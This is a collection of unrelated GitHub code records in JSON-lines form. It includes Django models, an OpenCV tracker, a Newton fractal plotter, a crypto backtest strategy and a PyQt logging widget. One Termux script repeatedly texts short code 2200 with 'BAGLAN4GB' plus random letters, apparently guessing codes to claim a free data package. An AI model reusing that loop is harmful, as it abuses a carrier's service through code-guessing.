value_time = models.PositiveIntegerField(\n blank=True,\n null=True,\n verbose_name='notification_value_time'\n )\n\n def __str__(self):\n if self.value_time is None:\n return '---'\n return str(self.description)\n\n objects = models.Manager()\n","repo_name":"SergeyMikulenko/training_project_2_calendar","sub_path":"events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20551787264","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport rospy\nfrom std_msgs.msg import Float64MultiArray\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nglobal bridge, cvImage\nbridge = CvBridge()\n\ndef image_callback(data):\n global bridge, cvImage\n try:\n cvImage = bridge.imgmsg_to_cv2(data,\"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n\n# Capture the input frame from webcam\n\n\n # Resize the input frame\n #frame = cv2.resize(frame, None, fx=scaling_factor,fy=scaling_factor, interpolation=cv2.INTER_AREA)\n\n\nif __name__=='__main__':\n global cvImage\n imageArray = Float64MultiArray()\n imageArray.data = [0,0,0,0]\n rospy.init_node('c1_pixelCoordinates', anonymous=True)\n rospy.Subscriber(\"/camera_array1/cam1/image_raw\", Image, image_callback)\n pub = rospy.Publisher('c1_pixelCoordinates', Float64MultiArray, queue_size=1)\n rate = rospy.Rate(10) \n\n # Iterate until the user presses ESC key\n frame_count = 0\n pixelCoords = np.zeros((1,2))\n scaling_factor = 0.5\n while not rospy.is_shutdown():\n try:\n frame = cvImage\n # Capture frame-by-frame\n #ret, frame = cap.read()\n frame = cv2.resize(frame, None, fx=scaling_factor,\n fy=scaling_factor, interpolation=cv2.INTER_AREA)\n # Convert the HSV colorspace\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n \n mask = cv2.inRange(hsv,np.array([0,150,150]),np.array([30,255,255]))\n \n # Bitwise-AND mask and original image\n res = cv2.bitwise_and(frame, frame, mask=mask)\n res = cv2.medianBlur(res, 5)\n \n\n _, contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n \n areas = [cv2.contourArea(c) for c in contours]\n if len(contours) > 0:\n max_index = np.argmax(areas)\n myBox = contours[max_index]\n x,y,w,h = cv2.boundingRect(myBox)\n #print(cv2.boundingRect(myBox))\n \n cv2.rectangle(frame,(x,y),(x+w,y+h), (0,0,255),1)\n \n\n #PIXEL COORDINATES OF OBJECT!!!\n \n pixelCoords = np.concatenate((pixelCoords,np.array([[x+0.5*w, y + 0.5*h]])))\n #print(pixelCoords[frame_count])\n x_Coord = x+0.5*w\n y_Coord = y+0.5*h\n area = w*h\n pixelTime = float(str(rospy.Time.now()))\n \n #print(\"X Pos: \" + str(x_Coord) + \" Y Pos: \" + str(y_Coord) + \" Area: \" + str(area))\n\n imageArray.data = [pixelTime, x_Coord, y_Coord, area]\n pub.publish(imageArray)\n \n frame_count += 1\n\n\n cv2.imshow('Original image', frame)\n cv2.imshow('Color Detector', res)\n \n c = cv2.waitKey(5)\n if c == 27:\n break\n except:\n print(\"error..waiting on camera\")\n cv2.destroyAllWindows()\ncv2.destroyAllWindows()\n","repo_name":"westpoint-robotics/ee489_pixel_to_gps","sub_path":"image_tracker/src/cam1_object_tracking.py","file_name":"cam1_object_tracking.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72962895235","text":"import numpy as np\nimport matplotlib.pyplot as mpl\nimport scipy as sp\nimport timeit as ti\nimport matplotlib as mp\n\nclass Fractal2D:\n def 
__init__(self, fcn , jacob=None):\n \"\"\"\n Parameters\n ----------\n fcn : Function\n The function which is to be evaluated. This must give its output in \n an array, length 2. \n\n Returns\n -------\n None.\n\n \"\"\"\n self.fcn = fcn\n self.jacob=jacob\n self.zeroes = [np.NaN]\n \n def Jacobean(self, X: np.array, h=1.e-5):\n \"\"\"\n Parameters\n ----------\n X: array\n the point at which the Jacobean is evaluated\n\n Returns\n -------\n Jac : array,\n 2 by 2 array giving the Jacobean. \n\n \"\"\"\n x1=X[0]\n x2= X[1]\n \n d1= (self.fcn(np.array([x1+h,x2]))-self.fcn(X))/h\n d2= (self.fcn(np.array([x1,x2+h]))-self.fcn(X))/h\n \n \n Jac= np.array( [[d1[0],d2[0]],\n [d1[1],d2[1]]])\n return Jac\n \n def NewtonMethod(self, X0: np.array , tol=1.0e-8):\n \"\"\"\n \n\n Parameters\n ----------\n X0 : np.array\n Initial value\n tol : float, optional\n Error tolerance of the zero points. The default is 1.0e-8.\n\n Returns\n -------\n index : int\n returns 0 if it does not converge, otherwise the position of the zero in self.zeroes. \n 'hello ' is the error message, which is here solely to indicate to ourselves that things have gone wrong. \n\n \"\"\"\n x=X0\n index='hello'\n for s in range(1000):\n jac= self.Jacobean(x)\n if np.linalg.det(jac)==0:\n index=f'zero {s}'\n break\n invjac= np.linalg.inv(jac)\n x_new = x - invjac @ self.fcn(x)\n x=x_new\n if np.abs(self.fcn(x)[0])<tol and np.abs(self.fcn(x)[1])<tol:\n # converged: look the zero up in self.zeroes, or record it as a new one\n for k, zero in enumerate(self.zeroes):\n if np.all(np.abs(x - zero) < tol):\n index = k\n break\n else:\n self.zeroes.append(x)\n index = len(self.zeroes) - 1\n break\n elif np.abs(self.fcn(x)[0])>1.e+5 or np.abs(self.fcn(x)[1])>1.e+5:\n # diverged: report non-convergence\n index = 0\n break\n else:\n index=0\n return index\n \n def plot(self, N:int, ends: tuple):\n \"\"\"\n \n\n Parameters\n ----------\n N : int\n Resolution of the plot\n ends : tuple\n endpoints of plot, tuple of four values a,b,c,d\n\n Returns\n -------\n None.\n\n \"\"\"\n a,b,c,d=ends[0],ends[1],ends[2],ends[3]\n x_vals=np.linspace(a,b,num=N)\n y_vals=np.linspace(c,d,num=N)\n X,Y=np.meshgrid(x_vals, y_vals , indexing='ij', sparse=True)\n gah=[[[e,f]for f in y_vals] for e in x_vals]\n p=np.array(gah)\n A=np.array([[self.NewtonMethod(np.array([e,f]))for f in y_vals]for e in x_vals])\n #now I have the matrix, and I thus need to colour it. wish me luck. 
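# A hedged usage sketch (assumed example, not from the original file): the\n # classic z**3 - 1 Newton fractal written as a two-component real system:\n # f = lambda X: np.array([X[0]**3 - 3*X[0]*X[1]**2 - 1,\n # 3*X[0]**2*X[1] - X[1]**3])\n # Fractal2D(f).plot(200, (-1.0, 1.0, -1.0, 1.0))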
\n mpl.figure()\n mpl.pcolor(A)\n \n ","repo_name":"Dod12/newton-method","sub_path":"Al version/fp_aux.py","file_name":"fp_aux.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6236115672","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0020_test'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserAvatar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n ('url', models.CharField(max_length=200, null=True)),\n ],\n ),\n migrations.DeleteModel(\n name='Test',\n ),\n migrations.RemoveField(\n model_name='users',\n name='Img',\n ),\n migrations.AddField(\n model_name='useravatar',\n name='user',\n field=models.OneToOneField(to=settings.AUTH_USER_MODEL),\n ),\n ]\n","repo_name":"moment-x/web","sub_path":"webapp2/users/migrations/0021_auto_20150803_0750.py","file_name":"0021_auto_20150803_0750.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73301888833","text":"import csv\nimport urllib.request\n\nrow_names = ['movieId','posterUrl']\nwith open('movies.csv', 'r', newline='') as in_csv:\n reader = csv.DictReader(in_csv, fieldnames=row_names, delimiter=',')\n for row in reader:\n movieId = row['movieId']\n posterUrl = row['posterUrl']\n extension = '.jpg'\n filename = 'img/' + movieId + extension\n try:\n with urllib.request.urlopen(posterUrl) as response:\n with open(filename, 'wb') as out_image:\n out_image.write(response.read())\n except:\n with open('movies_to_delete.csv', 'a', newline='') as out_csv:\n writer = csv.writer(out_csv, delimiter=',')\n writer.writerow([movieId])","repo_name":"xhuliodo/couch-potatoes","sub_path":"dataset/06-download-poster-pics/movie_poster.py","file_name":"movie_poster.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6359349957","text":"import subprocess\nimport random\nimport string\n\n\n# Ask the user how many times to repeat\ntekrar_sayisi = int(input(\"How many times should it repeat? \
\"))\n\n# Belirtilen sayıda tekrar edilen döngü\nfor i in range(tekrar_sayisi):\n # rasgele 7 karakterli bir dize oluştur\n letters = string.ascii_uppercase\n sms = ( ''.join(random.choice(letters) for i in range(7)) )\n smsmessage = (\"BAGLAN4GB \" + sms)\n # Use Subprocess Run Function to send SMS\n subprocess.run([\"termux-sms-send\", \"-n\", \"2200\", \"-s\", \"1\", smsmessage])\n # Print confirmation of each send\n print(smsmessage)\n","repo_name":"Teknoist/Random-Sms-Termux","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9756682700","text":"\n__MIDINR_OFFSET__ = 21\n\n\nclass ScaleNotSetException(Exception):\n pass\n\n\nclass Interval:\n def __init__(self, index=None, scale=None, midinr=None, register=None):\n if not index and not scale:\n raise ScaleNotSetException(\"No index or scale passed to constructor.\")\n\n if type(index) == Interval:\n self.index = index.index\n else:\n self.index = index\n self.scale = scale\n self.midinr = midinr\n self.register = register\n\n from pymusic.lang.scale.modern import ionian, aeolian\n self.major = ionian\n self.minor = aeolian\n\n if index and scale and register:\n midinr = 0\n for c in range(index - 1):\n midinr += scale[c]\n self.midinr = (__MIDINR_OFFSET__ + (12 * register)) + midinr\n elif scale and midinr and not index:\n normalized = (midinr - __MIDINR_OFFSET__) % 12\n index = val = 0\n while val < normalized:\n val += scale[index]\n index += 1\n self.index = index\n\n def is_perfect(self):\n if self.scale is None:\n raise ScaleNotSetException(\"Cannot determine if the interval is perfect if it hasn't a scale set.\")\n\n i = 0\n step_sum = sum(self.scale[:self.index-1])\n while i <= step_sum:\n for r in [5, 2, 5]:\n if step_sum == i:\n return True\n i += r\n return False\n\n def is_minor(self):\n if self.index not in [2, 3, 6, 7]:\n return False\n step_sum1 = sum(self.scale[:self.index-1])\n step_sum2 = sum(self.minor[:self.index-1])\n return step_sum1 == step_sum2\n\n def is_major(self):\n if self.index not in [2, 3, 6, 7]:\n return False\n step_sum1 = sum(self.scale[:self.index - 1])\n step_sum2 = sum(self.major[:self.index - 1])\n return step_sum1 == step_sum2\n\n def is_diminished(self):\n step_sum1 = sum(self.scale[:self.index - 1])\n step_sum2 = sum(self.minor[:self.index - 1]) - 1\n return step_sum1 == step_sum2\n\n def is_augmented(self):\n step_sum1 = sum(self.scale[:self.index - 1])\n step_sum2 = sum(self.major[:self.index - 1]) + 1\n return step_sum1 == step_sum2\n\n\ndef intervals(size=8):\n return [Interval(index=x) for x in range(1, size+1)]\n\n\nprimus, secundo, tertius, quartus, quinto, sexta, septimo, octava = intervals()\n","repo_name":"MacLotsen/PyMusic","sub_path":"pymusic/lang/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15397569656","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 策略代码总共分为三大部分,1)PARAMS变量 2)intialize函数 3)handle_data函数\n# 请根据指示阅读。或者直接点击运行回测按钮,进行测试,查看策略效果。\n\n# 策略名称:价值平均定投策略\n# 关键词:长期投资、高抛低吸、分批建仓。\n# 方法:\n# 1)确定每个周期的目标仓位;\n# 2)每一期将仓位调整至目标仓位;\n\n\n# 阅读1,首次阅读可跳过:\n# PARAMS用于设定程序参数,回测的起始时间、结束时间、滑点误差、初始资金和持仓。\n# 可以仿照格式修改,基本都能运行。如果想了解详情请参考新手学堂的API文档。\nPARAMS = {\n \"start_time\": \"2015-01-01 00:00:00\",\n \"end_time\": \"2016-09-01 00:00:00\",\n \"slippage\": 0.00001,\n \"account_initial\": 
{\"huobi_cny_cash\": 60000,\n \"huobi_cny_btc\": 0},\n}\n\n\n# 阅读2,遇到不明白的变量可以跳过,需要的时候回来查阅:\n# initialize函数是两大核心函数之一(另一个是handle_data),用于初始化策略变量。\n# 策略变量包含:必填变量,以及非必填(用户自己方便使用)的变量\ndef initialize(context):\n # 以日为单位进行回测\n context.frequency = \"1d\"\n # 设定以比特币为基准\n context.benchmark = \"huobi_cny_btc\"\n # 设定操作的标的为比特币\n context.security = \"huobi_cny_btc\"\n\n # 设置策略参数\n # 每个frequency的持仓总值的增长金额\n context.user_data.pos_value_growth_per_period = 100\n # 记录下当前处于第几个投资周期\n context.user_data.invest_period_count = 0\n # 设置策略期望初始仓位\n context.user_data.initial_pos_value = 0\n\n\n# 阅读3,策略核心逻辑:\n# handle_data函数定义了策略的执行逻辑,按照frequency生成的bar依次读取并执行策略逻辑,直至程序结束。\n# handle_data和bar的详细说明,请参考新手学堂的解释文档。\ndef handle_data(context):\n # 取得最新价格\n latest_close_price = context.data.get_current_price(context.security)\n # 计算当前实时仓位\n current_pos_value = getattr(context.account, context.security) * latest_close_price\n\n if context.user_data.initial_pos_value is None:\n context.user_data.initial_pos_value = current_pos_value\n\n # 计算当前期望仓位\n expected_pos_value = context.user_data.initial_pos_value + context.user_data.pos_value_growth_per_period * (\n context.user_data.invest_period_count + 1)\n # 当前账户持有的人民币现金\n current_cash_pos = context.account.huobi_cny_cash\n # 当前账户持有的数字货币数量\n current_sec_pos = getattr(context.account, context.security)\n # 计算本期需要投入的资金(若为负,则是撤回的资金)\n cash_to_spent = cash_to_spent_fn(context, expected_pos_value, current_pos_value, current_cash_pos, current_sec_pos,\n latest_close_price)\n context.log.info(\"本期需要投入的现金:%f元\" % cash_to_spent)\n\n # 更新投资周期至下一期\n context.user_data.invest_period_count += 1\n\n if cash_to_spent > 0:\n # 需要加仓,市价单买入\n context.log.info(\"正在买入%s\" % context.security)\n context.log.info(\"下单金额为 %s 元\" % round(cash_to_spent, 2))\n context.order.buy(context.security, cash_amount=str(cash_to_spent))\n else:\n # 需要减仓,计算需要卖出的数量,市价单卖出\n quantity = min(getattr(context.account, context.security), -1 * cash_to_spent / latest_close_price)\n context.log.info(\"正在卖出 %s\" % context.security)\n context.log.info(\"卖出数量为 %s\" % round(quantity))\n context.order.sell(context.security, quantity=str(quantity))\n\n\n# # 用户自定义的函数,可以被handle_data调用:计算每一个frequency需要买入/卖出的金额(正为买入,负为卖出)\ndef cash_to_spent_fn(context, expected_pos_value, current_pos_value, current_cash_pos, current_sec_pos,\n latest_close_price):\n # 低于目标仓位,需要买入加仓\n if expected_pos_value > current_pos_value:\n result = expected_pos_value - current_pos_value\n if result < current_cash_pos:\n return result\n else: # 现金不足,投入全部现金加仓\n context.log.warn(\n \"现金不足以满足目标仓位, 需要现金:%.2f, 现有现金:%.2f. 本次将用完全部现金\" % (result, current_cash_pos))\n return current_cash_pos\n else: # 当前仓位高于目标仓位,需要卖出减仓\n result = current_pos_value - expected_pos_value\n pos_qty_to_sell = result / latest_close_price\n if pos_qty_to_sell < current_sec_pos:\n return -1 * result\n else: # 仓位不足,卖出全部仓位\n context.log.warn(\n \"现有仓位不足以满足目标仓位, 需要卖出仓位:%.2f, 现有仓位:%.2f. 本次将卖出所有仓位\" % (pos_qty_to_sell, current_sec_pos))\n return -1 * latest_close_price * current_sec_pos\n","repo_name":"wequant-org/liveStrategyEngine","sub_path":"userStrategy/FixedPosValueGrowth.py","file_name":"FixedPosValueGrowth.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"zh","doc_type":"code","stars":612,"dataset":"github-code","pt":"61"} +{"seq_id":"12813184442","text":"from django.urls import path,include\nfrom . 
import views\nfrom .allDate import del_,insert_,update_\n\nurlpatterns = [\n path('', views.index,name='Index'),\n path('login/',views.login,name='Login'),\n path('update/', update_.update_, name='update'),\n path('del/', del_.del_, name='del'),\n path('splist/',views.splist,name='splist'),\n path('insert/', insert_.insert_, name='Insert'),\n]","repo_name":"blk1111/testweb","sub_path":"wweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17199689499","text":"# PyQt lib\nfrom PyQt5.QtWidgets import (QTimeEdit,QDateTimeEdit , QGridLayout, QHBoxLayout, QPushButton,\n QVBoxLayout,QWidget,QLCDNumber,QListWidget,QListWidgetItem,QFormLayout, QMessageBox)\nfrom PyQt5.QtCore import (QTime, QDateTime, QDate ,pyqtSignal, Qt)\n#py lib\nimport time\nimport threading\nimport pickle\nimport pdb\nimport queue\nimport numpy\n# view\nfrom view.pdfcreater import PdfCreater\nfrom view.reportDialog import ReportDialog\nfrom view.ticker import Ticker\nfrom view.historylist import HistoryList\n#UI\nfrom UI.recordUI import Ui_Form as RecodUI\n#model\nfrom model.toolkit import WRpickle\nfrom model.singleton import PickContext\nfrom model.database import DataHand\n\n\nclass PowerRecord(QWidget,RecodUI):\n \"\"\"docstring for PowerRecord\"\"\"\n\n beginTimeSignal = pyqtSignal(object,object)\n sqlTableName = pyqtSignal(object)\n stopSavePower = pyqtSignal(object)\n timeStateSignal = pyqtSignal(object)\n logStateSignal = pyqtSignal(object)\n plotlist = pyqtSignal(object,object,object)\n # plotlistbegin = pyqtSignal(object)\n\n def __init__(self):\n super(PowerRecord, self).__init__()\n # self.wrpick = WRpickle('data\\\\reportLast.pickle')\n # self.pickContext = self.wrpick.loadPick()\n self.pickContext = PickContext()\n self.datahand = DataHand()\n self.startTime = 0\n self.stopTime = time.time()\n self.userID = ''\n self.powerData = queue.Queue()\n self.pick = list()\n self.itemShowNum = 4\n self.itemChangeStatus = False\n self.timeStepPause = False\n # self.pdfItem = dict()\n self.figGet = None\n self.timebegin = True\n # self.loadFile()\n self.UI_init()\n # self.plantlist()\n # with open('template.qss') as t:\n # self.setStyleSheet(t.read())\n # self.initItemText()\n # self.arg = arg\n # self.timer = QTimer()\n # self.timer.timeout.connect(self.update())\n # self.timer.start(100)\n\n def UI_init(self):\n # self.ui = RecodUI()\n self.setupUi(self)\n # pdb.set_trace()\n\n self.seButton = self.logButton\n self.seButton.buttonState = 'begin'\n self.seButton.clicked.connect(self.beginOendTime)\n # self.timeEdit = self.timeEdit\n self.timeEdit.setDisplayFormat(' s : hh : mm')\n # self.timeEdit.setDate(QDate(2000,10,10))\n # print(self.timeEdit.text())\n self.ticker.hide()\n self.ticker = Ticker()\n self.gridLayout.addWidget(self.ticker, 3, 1, 1, 1)\n # self.formLayout.setWidget(3, QFormLayout.FieldRole, self.ticker)\n self.ticker.start()\n self.ticker.timeOut.connect(self.tickerTimeOut)\n # self.ticker.setNumDigits(10)\n # self.ticker.display('00:00:00')\n self.historyEdit = HistoryList()\n self.gridLayout_2.addWidget(self.historyEdit, 1, 0, 1, 2)\n self.historyEdit.itemSelectedEmit.connect(self.itemSelectionChanged)\n self.historyEdit.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.printButton.clicked.connect(self.printReport)\n # self.stepEdit.setValidator(QValidator(0.01,1000))\n # self.historyEdit.setCurrentRow(1)\n # for x in range(0,self.itemShowNum):\n # item = 
QListWidgetItem()\n # self.historyEdit.addItem(item)\n # self.historyEdit.itemSelectionChanged.connect(self.itemSelect)\n # buttonarea = QVBoxLayout()\n # self.printButton = self.printButton\n\n # buttonarea.addWidget(self.seButton)\n # buttonarea.addWidget(self.timeEdit)\n # buttonarea.addWidget(self.printButton)\n # buttonarea.addStretch()\n # buttonarea.addWidget(self.ticker)\n # mainLayout = QGridLayout()\n # mainLayout.addWidget(self.historyEdit, 0,1)\n # mainLayout.addLayout(buttonarea, 0, 0)\n # self.setLayout(mainLayout)\n # self.setLayout(self)\n\n\n # def itemSelect(self):\n # self.itemText = self.historyEdit.currentItem().text()\n # self.itemNum = self.historyEdit.currentRow()\n # # print(self.itemNum)\n # pickget = self.pick[-self.itemNum-1]\n # self.startTimetic = pickget.get('begin')\n # self.printUserID = pickget.get('userID')\n # print('itemSelect:',self.itemNum, self.startTimetic,self.printUserID)\n # self.itemChangeStatus = True\n # # print(self.itemText)\n\n def itemSelectionChanged(self,item):\n print('getitem',item)\n #get nowtable\n self.tableName = item\n self.sqlTableName.emit(self.tableName)\n temp = item.split('US')\n self.userID = temp[1]\n self.timeTick = temp[2:]\n # self.NowContextGet()\n #get last log\n self.pickContext = PickContext()\n #get username\n self.pickContext['worker'] = self.userID\n #get plot from db\n plotdata = self.datahand.getTableData(self.tableName)\n time_ = []\n power = []\n for x in plotdata:\n time_.append(x[0])\n power.append(x[1])\n self.plotlist.emit(False,time_,power)\n #get calc report\n if time_:\n self.pickContext['timelong'] = str(int(time_[-1]-time_[0]))+'秒'\n self.pickContext['maxsignalpower'] = self.__Power2str(max(power))\n self.pickContext['minsingalpower'] = self.__Power2str(min(power))\n self.pickContext['averagesingalepower'] = self.__Power2str(numpy.mean(power))\n self.pickContext['powerstable'] = self.__Power2str(numpy.std(power))\n else:\n self.pickContext['timelong'] = '0'\n self.pickContext['maxsignalpower'] = '0'\n self.pickContext['minsingalpower'] = '0'\n self.pickContext['averagesingalepower'] = '0'\n self.pickContext['powerstable'] = '0'\n print('PowerRecord change')\n self.pickContext.save_pick_file()\n\n def printReport(self):\n # self.getDbdata()\n if self.figGet:\n self.figGet.savePlotFig()\n rep = ReportDialog(self)\n # print('rep',rep)\n rep.exec_()\n if rep.saveOrcancel == 'save':\n print('pickContext',self.pickContext.pickContext)\n printer = PdfCreater(self,)\n self.sqlTableName.connect(printer.getDBData)\n printer.saveToFile()\n # printer.savePdf()\n\n # if self.itemChangeStatus is False:\n # self.itemText = self.historyEdit.item(0).text()\n # print('print:',self.itemText)\n # self.pdfItem['']\n\n def getNowFig(self,fig):\n self.figGet = fig\n\n\n # def NowContextGet(self):\n\n\n # # def plotTable():\n # pass\n\n\n def beginOendTime(self):\n # self.ticker.run()\n if self.seButton.buttonState == 'begin':\n self.timeLong = self.timeEdit2time()\n # pdb.set_trace()\n print('stepEdit',self.stepEdit.text()[:-1])\n self.timeStep = int(self.stepEdit.text()[:-1])\n if self.timeLong < self.timeStep:\n QMessageBox.information(self, \"设置错误\",\"记录时长要比记录步长大\")\n return\n else:\n #记录起始时间\n self.beginTime = time.time()\n print('beginTime:',self.beginTime)\n self.beginTimeSignal.emit(self.beginTime, self.timeStep)\n self.stopSavePower.emit(True)\n self.ticker.startTick(self.timeLong)\n self.timeStateSignal.emit(self.timeLong)\n self.logStateSignal.emit(True)\n\n self.seButton.setText('停止')\n self.seButton.buttonState 
= 'stop'\n elif self.seButton.buttonState == 'stop':\n self.ticker.stopTick()\n self.seButton.setText('开始')\n self.seButton.buttonState = 'begin'\n self.stopSavePower.emit(False)\n\n # def isStartSave(self,):\n # if self.timeLong < int(self.stepEdit.text())\n # QMessageBox.information(self, \"设置错误\",\n # \"记录时长要比记录步长大\")\n # return False\n # return True\n\n def tickerTimeOut(self):\n print('time out')\n self.seButton.setText('开始')\n self.seButton.buttonState = 'begin'\n self.stopSavePower.emit(False)\n\n\n def timeEdit2time(self):\n timeStr = self.timeEdit.text()\n timeSplit = timeStr.split(':')\n date = int(timeSplit[0].strip())\n hour = int(timeSplit[1].strip())\n minute = int(timeSplit[2].strip())\n return ((date*24+hour)*60+minute)*60\n\n def update_GUI(self):\n self.update()\n\n###\n# interface\n###\n\n def getUserID(self):\n return self.userID\n\n def setUserID(self,userid):\n self.userID = userid\n\n def getPowerData(self):\n return self.powerData\n\n def setPowerData(self,data):\n self.powerData.put(data)\n\n\n\n def getDbdata(self):\n if self.itemChangeStatus is False:\n self.itemText = self.historyEdit.item(0).text()\n self.itemNum = 0\n pickget = self.pick[-self.itemNum-1]\n self.startTimetic = pickget.get('begin')\n self.printUserID = pickget.get('userID')\n print('num,pick:',self.itemNum, self.startTimetic)\n print('print:',self.itemText)\n localTime = self.startTimetic\n username = self.userID\n localTime = str(int(localTime))\n tableName='TM'+localTime+'US'+username\n self.sqlTableName.emit(tableName)\n\n def timerSave(self):\n beginTime =self.beginTime\n continueTime = self.editTime\n self.pick.append({'begin':beginTime,\n 'continue':continueTime,'userID':self.userID})\n self.saveFile()\n self.loadFile()\n self.plantlist()\n\n self.stopTime = time.time()\n self.seButton.setEnabled(True)\n self.stopSavePower.emit(False)\n # self.seButton.setText('start')\n # self.timebegin = False\n\n def loadFile(self):\n try:\n with open('data\\\\usertask.pickle','rb') as f:\n self.pick = pickle.load(f)\n f.close()\n except FileNotFoundError:\n newfile = open('data\\\\usertask.pickle','wb')\n self.pick = list()\n pickle.dump(self.pick,newfile)\n newfile.close()\n # self.loadFile()\n except EOFError :\n pass\n\n except Exception as e:\n raise e\n\n def saveFile(self):\n try:\n with open('data\\\\usertask.pickle','wb') as f:\n pickle.dump(self.pick,f)\n f.close()\n except Exception as e:\n raise e\n\n def plantlist(self):\n if len(self.pick) < self.itemShowNum:\n textlist = self.pick\n else:\n textlist = self.pick[-self.itemShowNum:]\n for i,x in enumerate(textlist):\n if x.get('start',False) is not False:\n pass\n starttime = time.strftime('%H:%M:%S',time.localtime(x.get('start')))\n stoptime = time.strftime('%H:%M:%S',time.localtime(x.get('stop')))\n textstr = 'start:'+starttime+', stop:'+stoptime+', user:'+x.get('userID')\n elif x.get('begin',False) is not False:\n begin = time.strftime('%H:%M:%S',time.localtime(x.get('begin')))\n con = x.get('continue').toString()\n textstr = 'begin:' + begin + ', cont:' + con + ', user:'+x.get('userID')\n if i < self.itemShowNum:\n item = self.historyEdit.item(self.itemShowNum-i-1)\n item.setText(textstr)\n\n def __Power2str(self,data):\n if data > 0.1:\n return str(round(data,2))+'W'\n else:\n return str(round(data*1000,2)) + 'mW'\n\n # pdb.set_trace()\n # self.itemSelect()\n # self.timeEdit.setMaximumTime()\n # self.hourlabel = QLabel('时')\n # self.hourShow = QLCDNumber()\n # self.minlabel = QLabel('分')\n # self.minShow = QLCDNumber()\n # 
self.seclabel = QLabel('秒')\n\n # item.setText('kklong')\n # item = QListWidgetItem()\n # self.historyEdit.addItem(item)\n # item = QListWidgetItem()\n # self.historyEdit.addItem(item)\n # self.historyEdit.setReadOnly(True)\n # timebox = QHBoxLayout()\n\n # timebox.addWidget(self.hourlabel)\n # timebox.addWidget(self.hourShow)\n # timebox.addWidget(self.minlabel)\n # timebox.addWidget(self.minShow)\n # timebox.addWidget(self.seclabel)\n\n # self.printButton.clicked.connect(self.getDbdata)\n\n # timebox.addWidget()\n\n # mainLayout.addWidget(, 0, 0)\n # mainLayout.addLayout(timebox, 2, 0)\n\n # mainLayout.addLayout(buttonLayout2, 2, 1)\n # self.loadFile()\n\n # self.setWindowTitle(\"Simple Address Book\")\n\n # def timerStep(self):\n # threadStartTime = time.clock()\n # while self.timebegin:\n # timeStep = time.clock() - threadStartTime\n # gmTimeStep = time.localtime(timeStep)\n # # print(timeStep)\n # timestr = time.strftime('%H:%M:%S', gmTimeStep)\n # # print(timestr)\n # if self.editTime:\n # # pdb.set_trace()\n # nowQtime = QTime(gmTimeStep.tm_hour,gmTimeStep.tm_min)\n # if (self.editTime.minute() == nowQtime.minute())\\\n # and (self.editTime.hour() == nowQtime.hour()):\n # print('timeget')\n # self.timerSave()\n # self.timeStepPause = True\n # if self.timeStepPause is True:\n # threadStartTime = time.clock()\n # # print('st:',self.editTime,':',nowQtime)\n # self.ticker.display(timestr)\n # self.update_GUI()\n # time.sleep(0.3)\n\n\n\n\n # def startOrStop(self):\n # buttonState = self.seButton.text()\n # if buttonState == 'start':\n # print('start')\n # self.startTime = time.time()\n # self.seButton.setText('stop')\n # threading.Thread(target=PowerRecord.timeStep,args=(self,)).start()\n\n # # timeStep = time.clock() - self.startTime\n # elif buttonState == 'stop':\n # print('stop')\n # self.pick.append({'start':self.startTime,\n # 'stop':self.stopTime,'userID':self.userID})\n # self.saveFile()\n # self.loadFile()\n # self.plantlist()\n\n # self.stopTime = time.time()\n # self.seButton.setText('start')\n # self.timebegin = False\n # # print(timeStep)\n # beginTime = time.strftime('%H:%M:%S', time.localtime(self.beginTime) )\n\n # pdb.set_trace()\n # continueTime = 1\n # pdb.set_trace()\n # print(continueTime)\n # self.pick.append({'start:':beginTime,\n # 'stop':continueTime,'userID':self.userID,})\n\n\n\n\n # def timeStep(self):\n # threadStartTime = time.clock()\n # # self.timebegin = True\n # while self.timebegin:\n # timeStep = time.clock() - threadStartTime\n # # print(timeStep)\n # timestr = time.strftime('%H:%M:%S',time.localtime(timeStep))\n # # print(timestr)\n # self.ticker.display(timestr)\n # self.update_GUI()\n # time.sleep(1)\n # pdb.set_trace()\n # self.historyEdit.clear()\n # textstr.startTime = self.startTime\n # textstr = x['start']+':'+x['stop']+':'+x['userID']\n # print(textstr)\n # for x in range(1,self.itemShowNum):\n # pass\n # pdb.set_trace()\n # self.historyEdit.appendPlainText(textstr)\n # self.plaintlist.append(textstr)\n # if len(self.texlist) > 3:\n # return\n '''\n def beginOendTime(self):\n timeState = self.timeEdit.text()\n if self.seButton.buttonState == 'begin' and timeState != '0:00':\n #记录起始时间\n self.beginTime = time.time()\n print('beginTime:',self.beginTime)\n self.beginTimeSignal.emit(self.beginTime)\n # self.emitBeginTime()\n 